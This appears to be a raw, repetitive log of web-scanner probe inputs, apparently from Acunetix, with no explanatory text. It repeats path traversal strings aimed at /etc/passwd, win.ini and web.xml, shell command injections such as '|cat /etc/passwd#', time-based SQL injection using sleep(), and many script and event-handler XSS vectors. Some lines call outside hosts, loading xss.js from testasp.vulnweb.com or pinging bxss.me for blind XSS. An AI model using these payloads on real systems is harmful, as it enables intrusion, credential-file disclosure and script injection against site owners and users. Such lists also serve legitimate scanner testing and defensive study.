1

1

..\..\..\..\..\..\..\..\windows\win.ini

[url=http://www.acunetix.com]website security[/url]

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1_cPhvi <ScRiPt >prompt(970139)</ScRiPt>

1

|cat /etc/passwd#

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'|'ld

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1

1

1

${100161+100352}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1&n996894=v905101

1

WEB-INF/web.xml

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

acu1208\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1208

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

1

acux9523\xc0\xbez1\xc0\xbcz2a\x90bcxuca9523

1

"

1<ScRiPt >prompt(942547)</ScRiPt>

/etc/passwd

WEB-INF\web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

)

1

1

1

||cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

!(()&&!|*|*|

1

1<script>prompt(956447)</script>

1

1

1

^(#$!@#$)(()))******

1

&dir

-1

1

1<ScRiPt >prompt(919388)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

-1)

1

1

-1))

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952177></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

jyPRDqMS'

1

1

1

'"()

1<ScRiPt >prompt(924067)</ScRiPt>

msBpg0A6')

1

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1<video><source onerror="javascript:prompt(917977)">

1

1

eQWSnauE'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

|dir

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945826)"></g></svg>

'

1

1

-1

1

file:///etc/passwd

1

1

"

1<div style=width:expression(prompt(916592))>

1

'|dir

-1)

/\../\../\../\../\../\../\../etc/passwd

1

http://hitOocROHyUw8.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

-1))

1

1

1<iframe src='data:text/html

acunetix_wvs_invalid_filename

"|dir

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

WxO76wxr'

WEB-INF/web.xml

1

comments

1<body onload=prompt(916517)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

fNJ0Kzlm')

1

'"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(995699)>

comments

WEB-INF\web.xml

http://www.acunetix.tst

<!--

1

1

JRdmey8t'))

1

1<img src=xyz OnErRor=prompt(934221)>

comments/.

1

1'"()&%<ScRiPt >prompt(952239)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1<img/src=">" onerror=alert(953120)>

1

1

1

'"()&%<ScRiPt >prompt(939497)</ScRiPt>

1

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt%20>prompt(983228)</sCripT>

response.write(9588340*9396666)

1

1_945460

1

1

../../../../../../../../../../windows/win.ini.jpg

1&lt

'+response.write(9588340*9396666)+'

1

1

1

"+response.write(9588340*9396666)+"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

\xf6<img acu onmouseover=prompt(934445) //\xf6>

1

1

1

1<input autofocus onfocus=prompt(910299)>

................windowswin.ini

&cat /etc/passwd&

1

1

1

<a href='http://www.acunetix.com'>website security</a>

'&cat /etc/passwd&'

..\..\..\..\..\..\..\..\windows\win.ini

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1_aHj5C <ScRiPt >prompt(902510)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

`cat /etc/passwd`

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

../../../../../../../../../../etc/passwd

1

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99426+99280}

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

"|"ld

1&n995936=v959018

WEB-INF/web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

acu7393\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7393

1

1

testasp.vulnweb.com

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

WEB-INF\web.xml

acux10617\xc0\xbez1\xc0\xbcz2a\x90bcxuca10617

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(970325)</ScRiPt>

1

'

1

1

1

1<script>prompt(954579)</script>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

1<ScRiPt >prompt(983747)</ScRiPt>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

||cat /etc/passwd

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988006></ScRiPt>

1

^(#$!@#$)(()))******

/etc/passwd

1

-1

&dir

1

1

1

1

1<ScRiPt >prompt(966188)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

'"()

1<video><source onerror="javascript:prompt(970445)">

'&dir&'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

'

1

1

"&dir&"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(914950)"></g></svg>

1

1

1

C3CEtj1R'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<div style=width:expression(prompt(938834))>

1

http://hit411XCMdRxQ.bxss.me/

"

P9O3RVtr')

acunetix_wvs_invalid_filename

|dir

${@print(md5(acunetix_wvs_security_test))}

1

1<iframe src='data:text/html

1

1

comments

1

${@print(md5(acunetix_wvs_security_test))}\

'|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1VyPn19p'))

1<body onload=prompt(953841)>

comments

http://www.acunetix.tst

1

file:///etc/passwd

'"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903466)>

-1

1

"|dir

<!--

1

comments/.

-1)

1'"()&%<ScRiPt >prompt(959731)</ScRiPt>

1<img src=xyz OnErRor=prompt(974006)>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1<img/src=">" onerror=alert(942282)>

1

'"()&%<ScRiPt >prompt(947594)</ScRiPt>

-1))

1<ScRiPt%20>prompt(938647)</sCripT>

1

WEB-INF/web.xml

1

1

1

1_957150

oYGIVLFR'

1

1&lt

WEB-INF\web.xml

1

1

response.write(9839478*9401000)

1

\xf6<img acu onmouseover=prompt(933640) //\xf6>

1

M7fDFCLB')

1

1

../../../../../../../../../../windows/win.ini

'+response.write(9839478*9401000)+'

1

ajjlH7ZD'))

&cat /etc/passwd&

1<input autofocus onfocus=prompt(996924)>

1

1

1

"+response.write(9839478*9401000)+"

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../boot.ini

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

[url=http://www.acunetix.com]website security[/url]

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1_TxDGk <ScRiPt >prompt(907419)</ScRiPt>

../../../../../../../../../../etc/passwd

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

................windowswin.ini

1

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

..\..\..\..\..\..\..\..\windows\win.ini

|cat /etc/passwd#

1

1

1

${100342+99199}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'|'ld

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1&n954329=v941756

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

acu7762\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7762

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

acux3448\xc0\xbez1\xc0\xbcz2a\x90bcxuca3448

1

'

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<ScRiPt >prompt(918721)</ScRiPt>

1

!(()&&!|*|*|

1

/etc/passwd

1<script>prompt(999583)</script>

1

^(#$!@#$)(()))******

WEB-INF/web.xml

"

1

1

1

1

1<ScRiPt >prompt(996050)</ScRiPt>

WEB-INF\web.xml

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'"()

1

1

1

&dir

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997911></ScRiPt>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1<ScRiPt >prompt(967803)</ScRiPt>

1

1

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

'

1

1<video><source onerror="javascript:prompt(958744)">

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"&dir&"

-1

"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979931)"></g></svg>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

|dir

file:///etc/passwd

1

1

1<div style=width:expression(prompt(916826))>

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

/\../\../\../\../\../\../\../etc/passwd

1<iframe src='data:text/html

acunetix_wvs_invalid_filename

'|dir

1

1

KwoYw1Zx'

1

http://hitib715PLCSW.bxss.me/

1

1

comments

1<body onload=prompt(937006)>

1

"|dir

1

rC9KGxlg')

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(925286)>

comments

WEB-INF/web.xml

1

1

2972cWyJ'))

1

1

1

1

-1

comments/.

1<img src=xyz OnErRor=prompt(978073)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

WEB-INF\web.xml

'"

1<img/src=">" onerror=alert(964587)>

1

-1)

1

1'"()&%<ScRiPt >prompt(938035)</ScRiPt>

<!--

../../../../../../../../../../windows/win.ini

response.write(9971290*9260504)

1<ScRiPt%20>prompt(900646)</sCripT>

-1))

1

1

1

1

'+response.write(9971290*9260504)+'

../../../../../../../../../../boot.ini

7BpkPctK'

'"()&%<ScRiPt >prompt(923346)</ScRiPt>

1&lt

1

1

1

"+response.write(9971290*9260504)+"

1

joZx1m6h')

1

\xf6<img acu onmouseover=prompt(916942) //\xf6>

1

1

1_928345

../../../../../../../../../../windows/win.ini.jpg

8O6Tjla2'))

1

1

1

1<input autofocus onfocus=prompt(945365)>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

1

[url=http://www.acunetix.com]website security[/url]

&cat /etc/passwd&

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1_5yJ6l <ScRiPt >prompt(998169)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

"&cat /etc/passwd&"

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

`cat /etc/passwd`

1

${100026+100153}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1&n975805=v980968

1some_inexistent_file_with_long_name%00.jpg

1

WEB-INF/web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

1

testasp.vulnweb.com

1

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

'

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

acu8340\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8340

1

1

^(#$!@#$)(()))******

1

/etc/passwd

acux2121\xc0\xbez1\xc0\xbcz2a\x90bcxuca2121

'"()

"

1

1

1

1

1<ScRiPt >prompt(950300)</ScRiPt>

1

||cat /etc/passwd

1

1

1

1

1<script>prompt(906108)</script>

1

1

&dir

1<ScRiPt >prompt(961547)</ScRiPt>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954070></ScRiPt>

'&dir&'

"

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}

1

1<ScRiPt >prompt(924184)</ScRiPt>

1

http://hitH5QugdIbPx.bxss.me/

|dir

-1)

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1<video><source onerror="javascript:prompt(928368)">

1

-1))

1

comments

1

1

'|dir

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983585)"></g></svg>

1

comments

8ErVR4uW'

1

1

1

1<div style=width:expression(prompt(935753))>

file:///etc/passwd

1

comments/.

1

1

sdni3jJD')

"|dir

1<iframe src='data:text/html

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

http://www.acunetix.tst

1

/\../\../\../\../\../\../\../etc/passwd

1<body onload=prompt(981113)>

0vVaWo4w'))

1

'"

1

1

1

-1

1

<!--

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988645)>

1'"()&%<ScRiPt >prompt(913022)</ScRiPt>

-1)

1

1

1

1<img src=xyz OnErRor=prompt(936361)>

1

1

1

-1))

response.write(9842085*9666367)

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(917948)</ScRiPt>

1

Gz5asJP9'

1

1<img/src=">" onerror=alert(979642)>

'+response.write(9842085*9666367)+'

1

../../../../../../../../../../windows/win.ini

1_934747

1

aiF7mZjO')

"+response.write(9842085*9666367)+"

1<ScRiPt%20>prompt(975169)</sCripT>

&cat /etc/passwd&

1

../../../../../../../../../../boot.ini

LJTYM9O5'))

1

SomeCustomInjectedHeader:injected_by_wvs

1&lt

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

\xf6<img acu onmouseover=prompt(941936) //\xf6>

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1<input autofocus onfocus=prompt(942119)>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

................windowswin.ini

1

[url=http://www.acunetix.com]website security[/url]

1

`cat /etc/passwd`

1

1_9RpkR <ScRiPt >prompt(999654)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

1

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

${100193+99558}

'|'ld

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

acu4988\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4988

1

1&n975443=v960670

1

1

acux8083\xc0\xbez1\xc0\xbcz2a\x90bcxuca8083

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(906795)</ScRiPt>

1

testasp.vulnweb.com

"

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<script>prompt(957018)</script>

/etc/passwd

1

||cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

)

1

1

-1

1<ScRiPt >prompt(986153)</ScRiPt>

WEB-INF/web.xml

!(()&&!|*|*|

1

1

&dir

-1)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906482></ScRiPt>

1

^(#$!@#$)(()))******

-1))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

WEB-INF\web.xml

QTIpIdwj'

1

1

'&dir&'

1<ScRiPt >prompt(941733)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()

1

1

"&dir&"

1<video><source onerror="javascript:prompt(944559)">

1

1

1

1

ulpbIEcf')

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

|dir

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938089)"></g></svg>

1

BgP8F4aU'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'|dir

1

-1

1

1

1

1

'

1<div style=width:expression(prompt(938810))>

acunetix_wvs_invalid_filename

"|dir

file:///etc/passwd

-1)

1

1

"

comments

1

http://hitx0LiZkkUEY.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

1<iframe src='data:text/html

/\../\../\../\../\../\../\../etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

5IWVpCN8'

1

${@print(md5(acunetix_wvs_security_test))}\

1<body onload=prompt(927677)>

1

1

http://www.acunetix.tst

1

otOmFPZp')

comments/.

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(960739)</ScRiPt>

'"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955286)>

dES4Ouli'))

1

1

1

1

1<img src=xyz OnErRor=prompt(942851)>

WEB-INF\web.xml

<!--

1

'"()&%<ScRiPt >prompt(988247)</ScRiPt>

1<img/src=">" onerror=alert(979734)>

1

1

../../../../../../../../../../windows/win.ini

1

1

1_977487

1<ScRiPt%20>prompt(936780)</sCripT>

1

1

1

1

../../../../../../../../../../boot.ini

1

1&lt

1

1

response.write(9833498*9116047)

1

1

1

1

\xf6<img acu onmouseover=prompt(928335) //\xf6>

../../../../../../../../../../windows/win.ini.jpg

1

'+response.write(9833498*9116047)+'

1

1

1<input autofocus onfocus=prompt(999607)>

"+response.write(9833498*9116047)+"

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

&cat /etc/passwd&

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'&cat /etc/passwd&'

1

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

"&cat /etc/passwd&"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1_rUISg <ScRiPt >prompt(946046)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

../../../../../../../../../../etc/passwd

`cat /etc/passwd`

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

${99422+99801}

1

../../../../../../../../../../etc/passwd.jpg

1

'|'ld

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n967081=v929972

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

acu7746\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7746

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF\web.xml

acux10113\xc0\xbez1\xc0\xbcz2a\x90bcxuca10113

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

'

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(996375)</ScRiPt>

!(()&&!|*|*|

1

1

1<script>prompt(904065)</script>

1

^(#$!@#$)(()))******

"

1

/etc/passwd

1

1

1<ScRiPt >prompt(971435)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913796></ScRiPt>

||cat /etc/passwd

1

1

1

1<ScRiPt >prompt(933432)</ScRiPt>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

&dir

1

1<video><source onerror="javascript:prompt(975734)">

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'&dir&'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960586)"></g></svg>

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

"&dir&"

1

1

-1)

1<div style=width:expression(prompt(947968))>

1

1

"

1<iframe src='data:text/html

-1))

1

1

1

|dir

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1<body onload=prompt(968961)>

C9YpStoJ'

1

'|dir

http://hitvr6gLIPMSw.bxss.me/

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

/\../\../\../\../\../\../\../etc/passwd

RbG7TGAs')

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960401)>

comments

1

1

"|dir

1

1

comments

1<img src=xyz OnErRor=prompt(942321)>

1

ZR3HW8EK'))

1

WEB-INF/web.xml

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img/src=">" onerror=alert(975970)>

comments/.

1

1

-1

1

1

1<ScRiPt%20>prompt(918785)</sCripT>

1

1

-1)

1

'"

1

<!--

1

1&lt

-1))

1

1

WEB-INF\web.xml

1

1

response.write(9088145*9125189)

1

Kc8xGFOY'

1

1'"()&%<ScRiPt >prompt(981445)</ScRiPt>

\xf6<img acu onmouseover=prompt(978298) //\xf6>

1

../../../../../../../../../../windows/win.ini

1

1

1

1<input autofocus onfocus=prompt(929698)>

'"()&%<ScRiPt >prompt(987312)</ScRiPt>

Uz3wkVnF')

'+response.write(9088145*9125189)+'

1

1

1

../../../../../../../../../../boot.ini

adg0LJXr'))

1_939041

"+response.write(9088145*9125189)+"

<a href='http://www.acunetix.com'>website security</a>

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../windows/win.ini.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1_2Uwxf <ScRiPt >prompt(989943)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

